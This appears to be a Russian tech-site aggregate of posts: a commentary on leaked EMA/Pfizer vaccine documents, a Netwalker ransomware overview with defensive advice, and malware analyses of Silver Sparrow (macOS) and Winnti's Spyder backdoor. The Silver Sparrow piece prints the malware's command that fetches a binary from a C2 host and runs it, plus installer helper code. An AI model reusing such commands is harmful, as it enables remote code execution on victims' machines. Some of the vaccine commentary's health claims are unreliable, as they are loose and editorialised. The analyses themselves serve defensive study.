Русский
Русский
English
Статистика
Реклама

Антивирусная защита

Взломы и Вакцины, всё как вы любите

19.01.2021 04:12:56 | Автор: admin

За ссылки и первую часть текста спасибо SecAtor.

Европейское медицинское агентство (ЕМА) признало на прошлой неделе факт утечки в сеть некоторых данных в отношении лекарств и вакцин от COVID-19, полученных хакерами в результате компрометации ее сети. При этом ЕМА сообщает, что на ее работу и работу европейской сети регулирования лекарственных средств инцидент никак не повлиял, утверждение и распространение вакцин не нарушено. Призывают уголовно наказать виновных если поймают. "Если" как лаконично высказались когда-то жители Лаконии.

twitter.com/CryptoInsane/status/1349835605027516417
twitter.com/CryptoInsane/status/1350006585641340929
Хакеры слили украденные данные в отношении вакцины Pfizer в паблик. Перуанский исследователь CryptoInsane разметил сегодня в Twitter два сообщения, в которых сообщил об утечках данных, вероятно через специализированные сайты. По первой части в комментариях поминается ransomware Conti, во второй solarleaks.net

И, наконец, завершающая часть - французские журналисты из Le Monde изучили утечку данных в отношении вакцины Pfizer и выяснили, что на EMA оказывалось давление со стороны руководства Евросоюза с целью оформить скорейшее одобрение файзеровской вакцины для применения в ЕС. При этом нарушения EMA выявило серьезные, вплоть до того, что применяемые в ходе клинических испытаний образцы вакцины не соответствовали тем, которые поставлялись для самой вакцинации.

Знаю, что многие на Хабре хотели привиться именно этой вакциной, ну потому что понятно, Европе как-то побольше доверия. Если вы уже кинули минус в карму автору, можете заглянуть под кат за подробностями
<cut text="что накопали французские журналисты"/>

Я перевожу тут не всю статью, а только те часть, которые мне показались интересными. За подробностями люди на французском не читающие легко могут обратиться к переводчику, 21-ый век всё ж таки.

EMA в пятницу, 15 января, всвоем заявлении сказало, что некоторые из писем должностных лиц, былиобработаныхакерами, однако в переписке с Le Monde вынуждены были признаться, что "просочившиеся электронные письма отражают проблемы и обсуждения, которые имели место". Короче отмазывались юридически безупречно.

Давление на ЕМА по меркам России было не таким уж откровенным. Один чиновник ЕМА высказал удивление тем что что Урсула фон дер Лейен, президент Европейской комиссии, четко определила две вакцины, которые могут быть одобрены до конца года[Pfizer-BioNTech и Moderna].Есть еще проблемы и с тем , и с другим, за день до этого регуляторный орган в ходе телефонной конференции в довольно напряженной, иногда даже немного неприятной атмосфере, дали представление о том, чего можно ожидать EMA, если ожидания политиков не оправдаются, вне зависимости от того являются ли эти ожидания реалистичными или нет.

Ещё один чиновник ЕМА жалуется что поговорил с Еврокомиссаром по здравоохранению Стеллой Кириакидес (министр здравоохранения по нашему), которая обязалась вакцину "одновременно предоставить всем государствам членам" и подчеркнула, что для этого важно "не заставлять" государства ЕС использовать свои собственные процедуры одобрения.

Формулировка классная, обязательно запомню для каких-нибудь переговоров, но, кажется, имелось в виду не избавление государств членов от их собственных минздравов, а всего лишь то, что если EMA затянет сертификацию, то государства вынуждены будут сами принять у себя локально решение о применении на основе специальной чрезвычайной директивы EC. Короче верховенство общепризнанных процедур и правил во всей красе, если регулятор откажется сотрудничать и подгонять решения под политическую необходимость к нужной дате его просто выкинут из цепочки принятия решения. К чести чиновников EMA даже в таких прекрасных условиях они старались что-то сделать

В той части документов, которые EMA не пыталась оспаривать подробно расписано что пошло не так с одобрением вакцины.В ноябре Европейское агентство сформулировало три"основных возражения"касающихся вакцины: некоторые производственные объекты в ноябре еще не были проверены; данные о коммерческих партиях вакцин отсутствовали; но, что более важно, коммерческая вакцина качественно отличается от той, которую испытывали.

Блокирующий пункт

Чтобы перейти от клинической стадии к массовому производству, а также при покупке новых производственных площадок, производители вынуждены были изменить свои производственные процессы.

Звучит немного внезапно, но всё встаёт на свои места если отвлечься от французской статьи и заглянуть за некоторыми нюансами и ссылочками в англоязычную википедию, Вакцина Pfizer-BioNTech очень экзотична, на столько, что до пандемииCOVID-19 ни один мРНК-препарат или вакцина не были лицензированы для использования на людях, а многие компании забросили попытки развивать вакцины на таком принципе из-за жестоких побочек. Проблемы полезли потому что такие препараты никогда в истории человечества массово не производились, и скоро мы станем свидетелями самых масштабных в истории человечества испытаний абсолютно новой технологии на людях. Зато производство очень дёшево.

Вакцина представляет из себя не продукт какой-нибудь лютой генной инженерии, как векторные вакцины, а является масляным наноспреем - взвесью нанокапель в которых прямо напрямую без всяких дополнительных средств транспорта плавают синтезированные фрагменты матричной РНК по которой клетки пациента наделают белков того самого шипика короны, который во все стороны торчит из вирусной капсулы. Именно этим определяются драконовские условия хранения вакцины - её нужно замораживать до -80С, что превращает логистику и разморозку в непрекращающийся праздник.

мРНК не берется из живых клеток, а синтезируется напрямую по расшифрованному коду ДНК, что даёт технологии большую гибкость, её пытались применять для создания препаратов от разных крайне редких болезней, и для терапии рака, чуть ли не индивидуализированной. Также пытались сделать ставку на дешевизну и создать вакцины от хайповых или массовых болезней: бешенства, Зика, цитомегаловируса и гриппа. Но ничего из этого не было одобрено пока не пришло ковидло и не создало уникальную возможность.

Но вернёмся к статье, по данным чиновников EMA точный состав испытываемой и массовой вакцин отличается во многом и в частности в степени целостности фрагментов мРНК. В образцах для клинических испытаний от 69% до 81% цепочек представляли собой целую матрицу по которой белок может быть синтезирован от начала до конца. С другой стороны, данные о партиях, произведенных на новых производственных линиях, показали более низкие проценты целых мРНК, в среднем 59%.В некоторых партиях снижение достигало 51%.Именно это назвали "блокирующим пунктом" в сообщении EMA 23 ноября. В ушедшей на испытания вакцине применялся фильтр отделяющий полноценные молекулы от коротких обрезков, но его оказалось трудно масштабировать для коммерческого производства.

Нужный иммунный ответ всё равно будет объяснил, один из бывших сотрудников Стив Пасколо, научный сотрудник университетской больницы Цюриха, который уже двадцать лет работает над РНК-вакцинами (соучредитель CureVac в 2000 году он покинул эту компанию и сегодня имеет совместные проекты с BioNTech). Для иммунного ответа порой хватало одного микрограмма вещества, а в дозе его 30 мкг. С хорошим запасом. Так же считают и в FDA USA - американском регуляторном органе, где вакцину одобрили для чрезвычайного использования, в английском и канадском регуляторе. Вакцине потребуется потом и обычное одобрение чтобы как в переписке метко высказались "регионы не получали субоптимальные материалы".

Тоже надо запомнить на будущие разговоры с менеджерами, не баг, а субоптимальная реализация. :)

Серьезное возражение

26 ноября BioNTech и Pfizer ответили на возражения EMA. Предложили как-нибудь поднять долю целых мРНК чтобы до конечных потребителей с учётом распада по дороге, доходили целыми хотя бы 50% молекул. И даже использовать некоторое количество настоящих коммерческих вакцин в испытаниях (ого какое заметное послабление). Кажется EMA-шников они с первого раза не убедили, потому что 30-ого ноября на конец украденных фрагментов переписки торг продолжался. Фрагмент одного отчёта позволяет предположить, что возможно выход полезного продукта смогут увеличить до 75%. Это было бы неплохо, потому что если количество фрагментов, синтезирующих хорошие целые белки падает с 81% до 50%, это значит что всякого мусора и неправильно порезанных образцов для сборки становится больше в 5 раз и EMA напоминает, что по ним тоже что-то может синтезироваться и никто не знает как это повлияет на человека.

Через несколько дней статья по ситуации с массовым производством попала в Wall Street Journal но в компании ответили, что хоть у них и задержалась в итоге поставка с некоторых заводов, но в целом всё хорошо, и они продолжают работать с EMA, чтобы в запланированные сроки 21-ого получить полноценное одобрение. Логично, сроки то уже со всеми согласованы.

Русские сделали это?

Никаких доказательств нет, но нужно рассмотреть версию, что весь этот взлом устроили русские или какие-то неизвестные русофилы. Один из аргументов, что файлы для России были выложены на сайте rutor название которого состоит из "ru" как Россия и "tor" как название анонимного браузера. Представляю что бы сказали создатели торрент-трекера rutor, узнав о такой этимологии их названия. А ещё русские уже практиковали кражу дискредитирующих документов с их последующей утечкой в деле антидопингового агентства.

Отряд хакеров-русофилов...

Заключение

Надеюсь вас это всё развлекло так же как меня. Хотя экскурсия в мир международно-одобренных вакцин, немножко пугает. Кроме вакцин на мРНК есть ещё куча разных вариантов от совсем разных наций-производителей, из которых вы можете выбирать. Может такого эталонного бардака там не будет, но что-нибудь такое от чего у вас зашевелятся на голове волосы, наверняка спрятано во многих лабораторных шкафах.

Как говорится, я видел фильм про зомби-апокалипсис, начинавшийся точно так же.

P.S. И да, не затягивайте с вакцинацией какой-нибудь другой вакциной. По сравнению со странами, вынужденными экстренно колоться этой вакциной у нас ещё жить можно, но было бы плохо догнать их ценой жизни ваших родственников. Россия в пике - 4,3 смерти от ковидлы на миллион в день, Канада - 5.5, Израиль 6, США - 13.4, Великобритания - 23.5

Подробнее..

Перевод Всё, что нужно знать о программе-вымогателе Netwalker

15.02.2021 14:04:42 | Автор: admin


В 2020 году киберпреступность росла в геометрической прогрессии: программы-вымогатели Emotet, Trickbot, Maze, Ryuk, а теперь и Netwalker стали серьезной проблемой во всех отраслях, больших и малых, государственных и частных, и пока нет оснований полагать, что эта тенденция ослабнет.
За 2019 год злоумышленники вымогательством получили от своих жертв около 11,5 миллиардов долларов. Для сравнения, в 2018 году эта цифра составила 8 миллиардов. По оценкам экспертов, к 2021 году потери от атак программ-вымогателей вырастет почти на 100% и достигнут 20 миллиардов долларов. С момента своих первых атак в марте 2020 года Netwalker, также известный как Mailto, позволил злоумышленникам получить в виде выкупа более 30 миллионов долларов.


Что из себя представляет программа-вымогатель Netwalker?


Netwalker это быстро набирающая масштабы программа-вымогатель, созданная в 2019 году группой киберпреступников, известной как Circus Spider. Circus Spider один из новых членов более обширной группы Mummy Spider. На первый взгляд Netwalker действует, как и большинство других разновидностей программ-вымогателей: проникает в систему через фишинговые письма, извлекает и шифрует конфиденциальные данные, а затем удерживает их для получения выкупа.

Увы, Netwalker способен на большее, чем просто удержание захваченных данных в заложниках. Чтобы продемонстрировать серьезность своих намерений, Circus Spider публикует образец украденных данных в интернете, заявляя, что, если жертва не выполнит их требования вовремя, то в даркнет попадут и остальные данные. Circus Spider выкладывает конфиденциальные данные жертвы в даркнете в защищенной паролем папке и публикует пароль в интернете.

Программа-вымогатель Netwalker использует модель вымогательство как услуга (RaaS).
В марте 2020 года члены Circus Spider решили сделать имя Netwalker стало нарицательным. Они расширили свою партнерскую сеть подобно тому, как это сделала группа преступников, стоящих за Maze. Переход к модели программа-вымогатель как услуга (RaaS) позволил им существенно расширить масштабы, нацелиться на большее количество организаций и увеличить размеры получаемых выкупов.
Модель RaaS включает вербовку помощников для содействия в выполнении преступных планов. Как упоминалось выше, Netwalker начинал набирать обороты и уже имел ряд крупных результатов. Однако по сравнению с другими крупными группами вымогателей они оставались небольшими пока не перешли к модели RaaS.

Чтобы заслужить честь присоединиться к их небольшой преступной группе, Circus Spider опубликовали определенный набор требуемых критериев своеобразную криминальную вакансию, если хотите.
Их основные критерии при выборе помощников:
  • опыт работы с сетями;
  • владение русским (они не принимают англоговорящих);
  • они не обучают неопытных пользователей;
  • наличие постоянного доступа к целям, представляющим для них ценность;
  • доказательства наличия опыта.

Чтобы привлечь как можно больше потенциальных сторонников, Circus Spider опубликовали список возможностей, к которым их новые партнеры получат доступ.
Они включают:
  • полностью автоматическая панель чата TOR;
  • права наблюдателя;
  • поддержка всех устройств Windows, начиная с версии Windows 2000;
  • быстрый многопотоковый блокировщик;
  • быстрые и гибкие настройки блокировщика;
  • доступ к процессам разблокировки;
  • шифрование смежной сети;
  • уникальные сборки PowerShell для упрощения работы с антивирусными программами;
  • мгновенные выплаты.



На кого и на что нацелена программа-вымогатель Netwalker?


С момента первого крупного результата в марте 2020 года наблюдается всплеск атак программы-вымогателя Netwalker. В первую очередь, ее целями стали учреждения здравоохранения и образования. Они провели одну из своих наиболее публично освещенных кампаний против крупного университета, специализирующегося на медицинских исследованиях. Программа-вымогатель похитила конфиденциальные данные этого университета, и, чтобы показать серьезность намерений, злоумышленники выложили образец украденных данных в открытый доступ. Эти данные включали студенческие приложения, содержащие такую информацию, как номера социального страхования и другие конфиденциальные данные. Это нарушение привело к тому, что университет заплатил злоумышленникам выкуп в размере 1,14 миллиона долларов за расшифровку их данных.

Злоумышленники, стоящие за Netwalker, предприняли серьезную попытку извлечь выгоду из хаоса эпидемии коронавируса. Они рассылали фишинговые электронные письма на тему пандемии, выбрав целью медицинские учреждения, которые уже перегружены пострадавшими от пандемии. Сайт одной из первых жертв в сфере здравоохранения был заблокирован программой-вымогателем как раз в тот момент, когда люди начали обращаться к ним за советом во время пандемии. Эта атака вынудила их запустить второй сайт и направить пользователей на новый, вызвав беспокойство и замешательство у всех участников. В течение года Netwalker и другие группы программ-вымогателей продолжали атаковать медицинские учреждения, пользуясь тем, что они уделяют мало внимания информационной безопасности.

Помимо сфер здравоохранения и образования, Netwalker атакует организации в других отраслях, в том числе:
  • производство;
  • управление бизнесом;
  • управление потребительским опытом и качеством обслуживания;
  • электромобили и решения для накопления электричества;
  • образование;
  • и многие другие.


Как работает Netwalker?





Шаг 1: фишинг и проникновение


Netwalker в значительной степени полагается на фишинг и адресный фишинг как методы проникновения. Если сравнивать с другими программами-вымогателями, рассылки фишинговых писем у Netwalker происходят часто. Эти письма выглядят вполне легитимно, что легко вводит в заблуждение жертв. Обычно Netwalker прикрепляет сценарий VBS с названием CORONAVIRUS_COVID-19.vbs, который запускает программу-вымогатель, если получатель откроет вложенный текстовый документ с вредоносным сценарием.



Шаг 2: эксфильтрация и шифрование данных


Если сценарий открывается и запускается в вашей системе, значит Netwalker начал проникать в вашу сеть. С этого момента начинается отсчет времени до шифрования. Попав в систему, программа-вымогатель превращается в не вызывающий подозрений процесс, обычно в виде исполняемого файла Microsoft. Это достигается за счет удаления кода из исполняемого файла и внедрения в него собственного вредоносного кода для доступа к process.exe. Этот метод известен как Process Hollowing. Он дает программе-вымогателю возможность находиться в сети достаточно долго для извлечения и шифрования данных, удаления резервных копий и создания лазеек на случай, если кто-либо заметит, что что-то не так.

Шаг 3: вымогательство и восстановление (или потеря) данных


Как только Netwalker закончит эксфильтрацию и шифрование данных, жертва обнаружит, что данные украдены, и найдет записку с требованием выкупа. Записка с требованием выкупа Netwalker относительно стандартна: в ней объясняется произошедшее и что пользователь должен делать, если хочет вернуть свои данные в целости и сохранности. Затем Circus Spider потребует определенную сумму денег для оплаты в биткойнах, используя портал браузера TOR.


(Источник)

Как только жертва удовлетворяет выдвинутые требования, она получает доступ к своему индивидуальному инструменту дешифрования и может безопасно расшифровать свои данные.
Если жертва не выполнит требования вовремя, злоумышленники увеличат размер выкупа или опубликуют в даркнете все украденные данные либо их часть.
Ниже представлена схема конкретного пути атаки Netwalker.

(Источник)

Советы по защите от программы-вымогателя Netwalker


Netwalker становится все более изощренным, и от него все труднее защищаться. В первую очередь это связано с ростом их сети помощников.

Мы рекомендуем следующие простые процедуры для смягчения последствий:
  • Выполняйте резервное копирование важных данных на локальные хранилища данных;
  • Убедитесь, что копии критически важных данных хранятся в облаке, на внешнем жестком диске или устройстве хранения;
  • Защитите свои резервные копии и убедитесь, что данные невозможно изменить или удалить из системы, в которой они хранятся;
  • Установите и регулярно обновляйте антивирусное программное обеспечение на всех компьютерах;
  • Используйте только безопасные сети и избегайте общедоступных сетей Wi-Fi. По возможности используйте VPN;
  • Используйте двухфакторную аутентификацию с надежными паролями;
  • Регулярно обновляйте компьютеры, устройства и приложения. Netwalker, как и другие программы-вымогатели, использует уязвимости в системах и инфраструктуре, чтобы взять под контроль компьютеры пользователей и целые сети, а затем удерживает ваши данные в зашифрованном виде, пока вы не заплатите выкуп.

Хотя эти процедуры помогут уменьшить ущерб, нанесенный программой-вымогателем после заражения вашей системы, это все же лишь смягчение ущерба. Упреждающее выполнение этих процедур поможет предотвратить распространение и уменьшить ущерб от программ-вымогателей после того, как они проникли в вашу систему. Информирование и обучение сотрудников основам информационной безопасности станет мощным инструментом борьбы с Netwalker.

Не попадайтесь на фишинговые уловки


Поскольку Netwalker в основном заражает системы через рассылку фишинговых писем с вредоносными ссылками и исполняемыми файлами, информирование сотрудников вашей организации об опасностях фишинговых писем и о том, на что нужно обращать внимание для фильтрации подозрительных электронных писем, обязательная мера для защиты ваших конфиденциальных данных.
Обязательное регулярное обучение основам информационной безопасности это отличный способ предотвращения, который поможет вашей организации выявлять признаки вредоносных электронных писем. Вот на что нужно обращать внимание каждый раз, когда вы получаете электронное письмо с просьбой нажать на ссылку, загрузить файл или поделиться своими учетными данными:
  • внимательно проверьте имя и домен, с которого отправляется электронное письмо;
  • проверьте наличие явных орфографических ошибок в теме и тексте сообщения;
  • не сообщайте свои учетные данные законные отправители никогда их не попросят;
  • не открывайте вложения и не загружайте подозрительные ссылки;
  • сообщайте о подозрительных электронных письмах вашей службе информационной безопасности.

Мы также рекомендуем проводить симуляции атак. Отправка ненастоящих фишинговых писем сотрудникам вашей организации отличный способ оценить эффективность вашего обучения основам безопасности и определить, кому может потребоваться дополнительная помощь в этом вопросе. Отслеживайте показатели взаимодействия пользователей, чтобы узнать, кто взаимодействует с любыми ссылками или вложениями, выдает свои учетные данные или сообщает об этом ответственной службе в вашей организации.

Используйте системы обнаружения угроз на основе поведенческого анализа


Обучение сотрудников вашей организации распознаванию и реагированию на фишинговые атаки, связанные с программами-вымогателями, является большим подспорьем в защите ваших конфиденциальных данных. Однако раннее обнаружение угроз на основе поведенческого анализа позволит ограничить уязвимость перед разрушительными последствиями программ-вымогателей.
Если взломанная учетная запись пользователя начинает получать доступ к конфиденциальным данным, система обнаружения угроз на основе поведенческого анализа сразу об этом узнает и уведомит вас. Например, Varonis использует несколько моделей поведения, чтобы узнать, как определенные пользователи обычно обращаются к данным. Благодаря этому можно определить, когда характер доступа пользователя к данным или объемы данных начинают отличаться от обычных. Varonis различает ручные и автоматические действия и улавливает, если пользователь начинает перемещение или шифрование файлов необычным образом, в самом зародыше прекращая деятельность программы-вымогателя. Многие наши заказчики автоматизируют ответную реакцию на такое поведение, отключая учетную запись и прерывая активные соединения.
Также важно непрерывно отслеживать активность в файловой системе, чтобы вовремя распознать, когда программа-вымогатель сохраняет на диск известные инструменты проникновения (распространенная тактика Netwalker), или когда пользователь ищет в общих файловых ресурсах файлы с паролями или другими конфиденциальными данными.

Любая пользовательская учетная запись обычно имеет доступ к гораздо большему количеству данных, чем необходимо, поэтому эти поиски часто бывают плодотворными. О том, как снизить эти риски, читайте ниже.



Переходите на модель минимальных привилегий (Zero Trust)


Правильное обнаружение важный шаг к защите вашей организации от программ-вымогателей. Однако не менее важно создать такие условия, что даже если программа-вымогатель останется незамеченной для первичного обнаружения, ее урон будет минимальным. Организации могут добиться этого, сводя к минимуму данные, к которым они раскрывают доступ. Таким образом, количество данных, которые могут быть зашифрованы или украдены, будет ограничено.
Если вы подозреваете, что стали жертвой программы-вымогателя Netwalker, выполните поиск всех обращений к файлам и изменений, сделанных любым пользователем за любой период времени, чтобы точно определить затронутые файлы и восстановить правильные версии. Вы также можете обратиться к службе реагирования на инциденты Varonis, и мы бесплатно поможем вам расследовать инцидент.
Подробнее..

На 30 тысячах компьютеров с macOS нашли странный зловред, который ждёт команду

23.02.2021 10:12:21 | Автор: admin


Новая вредоносная программа Silver Sparrow (Серебряный воробей), обнаруженная почти на 30000 компьютерах Mac по всему миру, привлекла внимание специалистов по безопасности. Причин несколько. Во-первых, зловред поставляется в двух бинарниках, в том числе для процессора М1. Во-вторых, исследователи не могут понять цель злоумышленников.

Раз в час заражённые компьютеры проверяют контрольный сервер на предмет новых команд или двоичных файлов для выполнения:

curl hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json > /tmp/version.jsonplutil -convert xml1 -r /tmp/version.json -o /tmp/version.plist<anchor>habracut</anchor>...curl $(/usr/libexec/PlistBuddy -c "Print :downloadUrl" /tmp/version.plist) --output /tmp/verxchmod 777 /tmp/verx/tmp/verx upbuchupsf

Но до сих пор никакой полезной нагрузки не доставлено ни на одну из 30 000 заражённых машин. Отсутствие полезной нагрузки предполагает, что вредоносное ПО может начать действовать, как только будет выполнено неизвестное условие.

Любопытно, что вредоносное ПО поставляется с механизмом полного удаления, который обычно используется в профессиональных разведывательных операциях. Однако до сих пор нет никаких признаков использования функции самоуничтожения, что ставит вопрос о том, зачем этот механизм.

Помимо этих вопросов, вредоносная программа примечательна наличием бинарника для чипа M1, представленного в ноябре 2020 года. Это всего лишь вторая известная вредоносная программа macOS для M1. Двоичный файл ещё более загадочен, потому что для выполнения команд использует JavaScript API установщика macOS. Это затрудняет анализ содержимого установочного пакета или того, как этот пакет использует команды JavaScript. После установки зловред запускается командой system.run.

function bash(command) {         system.run('/bin/bash', '-c', command)    }    function appendLine(line, file)    {        bash(`printf "%b\n" '${line}' >> ${file}`)    }    function appendLinex(line, file)    {        bash(`"echo" ${line} >> ${file}`)    }    function appendLiney(line, file)    {        bash(`printf "%b" '${line}' >> ${file}`)    }


Silver Sparrow поставляется в двух версиях одна с двоичным кодом в формате mach-object, скомпилированным для процессоров Intel x86_64, а другая с двоичным кодом Mach-O для M1

Malware version 1
File name: updater.pkg (installer package for v1)
MD5: 30c9bc7d40454e501c358f77449071aa

Malware version 2
File name: update.pkg (installer package for v2)
MD5: fdd6fb2b1dfe07b0e57d4cbfef9c8149

Командный сервер
hxxps://specialattributes.s3.amazonaws[.]com/applications/updater/ver.json

После исполнения Silver Sparrow оставляет два скрипта на заражённом диске: /tmp/agent.sh и ~/Library/Application Support/verx_updater/verx.sh.

Вредоносная программа обнаружена в 153 странах, преимущественно в США, Великобритании, Канаде, Франции и Германии. Использование Amazon Web Services и сети доставки контента Akamai обеспечивает надёжную работу командной инфраструктуры, а также затрудняет блокировку серверов. Зловред открыли исследователи из компании Red Canary.

Хотя для Silver Sparrow ещё не вышло никакой полезной нагрузки, его считают достаточно серьёзной угрозой. Программа уже сильно распространилась, она совместима с процессорами М1 и выполнена на очень высоком техническом уровне: Silver Sparrow представляет собой достаточно серьёзную угрозу, для доставки потенциально эффективной полезной нагрузки в любой момент, пишут исследователи Red Canary в своём блоге. Учитывая эти причины для беспокойства, в духе прозрачности мы хотели как можно скорее поделиться всей информацией с индустрией информационной безопасности.

До сих пор исследователи не встречали зловреды подобного типа. Этот экземпляр они назвали 'bystander binary', то есть бинарник-наблюдатель. Любопытно, что при выполнении двоичный файл x86_64 отображает слова Hello World!, а бинарник M1 выдаёт You did it!. Исследователи подозревают, что файлы являются некими заполнителями, передают что-то установщику. Компания Apple отозвала сертификат разработчика для обоих бинарников.

Silver Sparrow всего лишь вторая вредоносная программа, написанная нативно для нового чипа Apple M1. Первым стал рекламный зловред GoSearch22 на прошлой неделе.

Нативный код M1 работает на новой платформе быстрее и надёжнее, чем код x86_64, потому что не нуждается в трансляции. Многие разработчики обычных приложений macOS до сих пор не завершили процесс перекомпиляции для M1.

После установки Silver Sparrow ищет, с какого URL был загружен установочный пакет, чтобы операторы ботнета знали, какой канал распространения наиболее эффективен. Пока остаётся неясным, как именно и где распространяется вредоносное ПО и как оно устанавливается. Однако проверка успешных URL предполагает, что одним каналом распространения может быть поисковая выдача, то есть установщики, скорее всего, выдают себя за законные приложения.

Одна из самых впечатляющих вещей в Silver Sparrow количество заражённых ею компьютеров Mac. Коллеги из Malwarebytes обнаружили, что Silver Sparrow установлен на 29139 конечных точках macOS по состоянию на 17февраля 2021 года. Это значительное достижение.

И это только компьютеры, доступные для антивируса MalwareBytes, так что реальное число намного выше. Это ещё раз показывает, что вредоносное ПО для macOS становится всё более распространённым и обычным явлением, несмотря на все усилия Apple, говорит Патрик Уордл (Patrick Wardle), эксперт по безопасности macOS.
Подробнее..

Исследуем Spyder еще один бэкдор группировки Winnti

04.03.2021 10:11:49 | Автор: admin

В конце прошлого года в нашу лабораторию за помощью обратилась зарубежная телекоммуникационная компания, сотрудники которой обнаружили в корпоративной сети подозрительные файлы. В ходе поиска следов вредоносной активности аналитики выявили образец весьма интересного бэкдора. Его анализ показал, что мы имеем дело с очередным модульным APT-бэкдором, использующимся хакерской группой Winnti.

Последний раз деятельность Winnti попадала в наше поле зрения, когда мы анализировали модификации бэкдоров ShadowPad и PlugX в рамках расследования атак на государственные учреждения стран Центральной Азии. Оба эти семейства оказались схожи концептуально и имели примечательные пересечения в коде. Сравнительному анализу ShadowPad и PlugX был посвящен отдельный материал.

В сегодняшней статье мы разберем бэкдор Spyder именно так окрестили найденный вредоносный модуль наши вирусные аналитики. Мы рассмотрим алгоритмы и особенности его работы и выявим его связь с другими известными инструментами APT-группы Winnti.

Чем примечателен Spyder

Вредоносный модуль представляет собой DLL-библиотеку, которая на зараженном устройстве располагалась в системной директории C:\Windows\System32 под именем oci.dll. Таким образом, модуль был подготовлен для запуска системной службой MSDTC при помощи метода DLL Hijacking. По нашим данным, файл попал на компьютеры в мае 2020 года, однако способ первичного заражения остался неизвестным. В журналах событий мы обнаружили записи о создании служб, предназначенных для старта и остановки MSDTC, а также для исполнения бэкдора.

Log Name: SystemSource: Service Control ManagerDate: 23.11.2020 5:45:17Event ID: 7045Task Category: NoneLevel: InformationKeywords: ClassicUser: Computer: Description:A service was installed in thesystem.Service Name: IIJVXRUMDIKZTTLAMONQService File Name: net start msdtcService Type: user mode serviceService Start Type: demand startService Account: LocalSystem
Log Name: SystemSource: Service Control ManagerDate: 23.11.2020 5:42:20Event ID: 7045Task Category: NoneLevel: InformationKeywords: ClassicUser: Computer: Description:A service was installed in thesystem.Service Name: AVNUXWSHUNXUGGAUXBREService File Name: net stop msdtcService Type: user mode serviceService Start Type: demand startService Account: LocalSystem

Также мы нашли следы запуска других служб со случайными именами, их файлы располагались в директориях вида C:\Windows\Temp\<random1>\<random2>, где random1 и random2 являются строками случайной длины из случайных символов латинского алфавита. На момент проведения исследования исполняемые файлы этих служб отсутствовали.

Интересной находкой стала служба, свидетельствующая об использовании утилиты для удаленного исполнения кода smbexec.py из состава набораImpacket. С её помощью злоумышленники организовали удаленный доступ к командной оболочке в полуинтерактивном режиме.

Исследуемый вредоносный модуль oci.dll был добавлен в вирусную базу Dr.Web как BackDoor.Spyder.1. Это название пришло к нам из артефактов бэкдора. В одном из найденных образцов остались функции ведения отладочного журнала и сами сообщения, при этом те из них, которые использовались при коммуникации с управляющим сервером, содержали строку Spyder.

Бэкдор примечателен рядом интересных особенностей. Во-первых, oci.dll содержит основной PE-модуль, но с отсутствующими файловыми сигнатурами. Заполнение сигнатур заголовка нулями предположительно было сделано с целью затруднения детектирования бэкдора в памяти зараженного устройства. Во-вторых, полезная нагрузка сама по себе не несет вредоносной функциональности, но служит загрузчиком и координатором дополнительных плагинов, получаемых от управляющего сервера. С помощью этих подключаемых плагинов бэкдор выполняет основные задачи. Таким образом, это семейство имеет модульную структуру, как и другие семейства бэкдоров, используемые Winnti, упомянутые ранее ShadowPad и PlugX.

Анализ сетевой инфраструктуры Spyder выявил связь с другими атаками Winnti. В частности инфраструктура, используемая бэкдорами Crosswalk и ShadowPad, описанными в исследовании Positive Technologies, перекликается с некоторыми образцами Spyder. График ниже наглядно показывает выявленные пересечения.

Пожалуйста, масштабируйте страницу для чтения надписей, спасибо :)Пожалуйста, масштабируйте страницу для чтения надписей, спасибо :)

Принцип действия

Бэкдор представляет собой вредоносную DLL-библиотеку. Имена функций в таблице экспорта образца дублируют экспортируемые функции системной библиотеки apphelp.dll.

Функционально образец является загрузчиком для основной полезной нагрузки, которую хранит в секции .data в виде DLL, при этом некоторые элементы DOS и PE заголовков равны нулю.

Работа загрузчика

Загрузка выполняется в функции, обозначенной как malmain_3, вызываемой из точки входа DLL через две промежуточные функции-переходника.

Далее следует стандартный процесс загрузки PE-модуля в память и вызов точки входа загруженного модуля (DllMain) с аргументом DLL_PROCESS_ATTACH, а после выхода из нее повторный вызов с DLL_PROCESS_DETACH.

Работа основного модуля

В основном модуле значения всех сигнатур, необходимых для корректной загрузки файла, приравнены к нулю.

  • IMAGE_DOS_HEADER.e_magic

  • IMAGE_NT_HEADERS64.Signature

  • IMAGE_NT_HEADERS64.FileHeader.Magic

Кроме того, TimeDateStamp и имена секций также имеют нулевое значение. Остальные значения корректны, поэтому после ручной правки необходимых сигнатур файл можно загрузить для анализа в виде PE-модуля.

Анализ основного модуля затруднен, так как периодически используются нетипичные способы вызова функций. Для хранения и обработки структур используется библиотека UT hash. Она позволяет преобразовывать стандартные C-структуры в хеш-таблицы путем добавления одного члена типа ut_hash_handle. При этом все функции библиотеки, такие как добавление элементов, поиск, удаление и т. д., реализованы в виде макросов, что приводит к их принудительному разворачиванию и встраиванию (inline) компилятором в код основной (вызывающей) функции.

Для взаимодействия с управляющим сервером используется библиотека mbedtls.

Функция DllMain

В начале исполнения проверяется наличие события Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f45853}, режим исполнения (из конфигурации) и командная строка, затем происходит запуск рабочих потоков.

Модуль имеет встроенную конфигурацию следующей структуры:

structcfg_c2_block{inttype;charfield_4[20];charaddr[256];}structcfg_proxy_data{DWORDdw;charstr[256];charproxy_server[256];charusername[64];charpassword[32];charunk[128];};structbuiltin_config{intexec_mode;charurl_C2_req[100];charhash_id[20];charstring[64];charfield_BC;cfg_c2_block srv_1;cfg_c2_block srv_2;cfg_c2_block srv_3;cfg_c2_block srv_4;cfg_proxy_data proxy_1;cfg_proxy_data proxy_1;cfg_proxy_data proxy_1;cfg_proxy_data proxy_1;intCA_cert_len;charCA_cert[cert_len];};

Поле hash содержит некое значение, которое может являться идентификатором. Это значение используется при взаимодействии с управляющим сервером и может быть представлено в виде строки b2e4936936c910319fb3d210bfa55b18765db9cc, которая по длине совпадает с SHA1-хешами.

Поле string содержит строку из одного символа: 1.

CA_cert сертификат центра сертификации в формате DER. Он используется для установки соединения с управляющим сервером по протоколу TLS 1.2.

В функции DllMain предусмотрено создание нескольких рабочих потоков в зависимости от ряда условий.

  • Основной поток thread_1_main

  • Поток запроса нового сервера thread_2_get_new_C2_start_communication

  • Поток исполнения зашифрованного модуля thread_4_execute_encrypted_module

Основной поток

Вначале бэкдор проверяет версию ОС, затем подготавливает структуру для инициализации функций и структуру для хранения некоторых полей конфигурации. Процедура выглядит искусственно осложненной.

В структуру funcs_struc типа funcs_1 заносятся 3 указателя на функции, которые будут поочередно вызваны внутри функции init_global_funcs_and_allocated_cfg.

